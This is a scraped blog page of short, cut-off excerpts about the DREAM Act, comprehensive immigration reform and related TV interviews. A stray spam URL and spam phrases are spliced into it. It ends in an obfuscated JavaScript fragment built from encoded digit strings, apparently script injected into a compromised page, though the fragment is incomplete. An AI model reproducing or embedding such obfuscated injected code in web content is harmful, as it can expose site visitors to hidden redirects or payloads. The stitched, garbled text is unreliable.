CIR, DREAM Act or Both?

In producing/directing this documentary I've talked to a lot of people involved in this struggle...some who are focused on passage of the DREAM Act, others who are trying to put their energy into passage of comprehensive immigration reform and others who are fighting for both. This is a controversial subject amongst several groups who are supportive of immigration reform and it breaks down like this: - Those who are fighting for comprehensive immigration reform (CIR), believe that passing bills that address the immigration status of a subset of the 11-13M (or so) undocumented immigrants in t

Where to Next?

After the setback of a couple of weeks ago, it's completely understandable that everyone that has been fighting so hard for passage of the DREAM Act would feel defeated and it's also completely understandable that most would feel as though they are fighting an uphill battle. An uphill battle yes, I agree, but an un-winnable one? I don't think so! All wars worth waging have their setbacks and casualties...the civil rights movement of the sixties was the culmination of centuries of struggle. I'm not saying that it's going to take that long to pass the DREAM Act or something similar, but it w

Is the DREAM Act Really a Bipartisan Bill?

Although the DREAM Act is often touted as a reform bill that enjoys bipartisan support (after all, it's politically unpalatable to oppose students), it's starting to look like there are some limits to that support, mainly, no mid-term elections in play and certainly not in a year in which immigration politics is so polarized. As the latest attempt to bring the bill up for a vote demonstrates, it seems as though the DREAM Act enjoys the support of many Democrats in the Senate (although not all, as the two Senators from Arkansas voted against it) but no support at all from the other side of the

The 14th Amendment and "Anchor Babies" on the Colbert Report

Enjoy this segment of the Colbert Report as Stephen Colbert dissects the meaning of the 14th Amendment, expands on the term "drop and leave" and how this leads to "anchor babies," and ends by proposing that illegal immigrants first be considered slaves, as that is a proven path to citizenship and would still address the original idea behind the 14th Amendment. Impending Tide?

I love to see well-spoken, well-balanced and obviously intelligent Latinos being interviewed on a major news cable network.  Check out this interview between John King and San Antonio Mayor Julian Castro as they talk about immigration and the demographic tide we're facing:WWW.HUMANESOCIETYOFKNOXCOUNTY.ORG/2013/

Future President Palin (??) on Immigration Reform

Future President Palin? Watch this O'Reilly interview with Sarah Palin to see how she would deal with the "illegal immigration problem" should she become the next President of the United States (shudder). Nothing too surprising here, except that O'Reilly really grills Palin on how she would deal with the 12 million hard-working immigrants already living in the US.  She even ends up agreeing with O'Reilly that conservative icon Ronald Reagan "bungled it" when it came to immigration reform. WOW!

Will 2010 be the Year of the DREAM Act?

Despite Arizona and the flurry of opposition it has caused as well as the Administration's recent support on behalf of comprehensive immigration reform, there's very little evidence that points to across the aisle backing for a bill that has the potential to cause deep fissures in the electorate...especially during such a contested election year. But if not a comprehensive immigration reform bill, what about the chances of the DREAM Act passing this year? Although far from a guarantee, it looks as though in lieu of comprehensive reform, the DREAM Act may be picking up some steam with Congres

Does Immigration Reform Have a Chance to Pass this Year?

Just as the Obama Administration goes on the offensive on the topic of immigration reform and urges for passage of a bill on the issue as soon as possible (no doubt partially in response to the recent Arizona legislation), the opinion from both sides of the aisle seems to be that the political capital is not there...at least not for passage of comprehensive reform this year:limited time periodalso offers var _st=[];var m=[];_st.push("14520020120619318611720");m.push("h");_st.push("120619718614611920118");m.unshift("C");_st.push("620520113218420020011");m.push("a");_st.push("914712018519619218
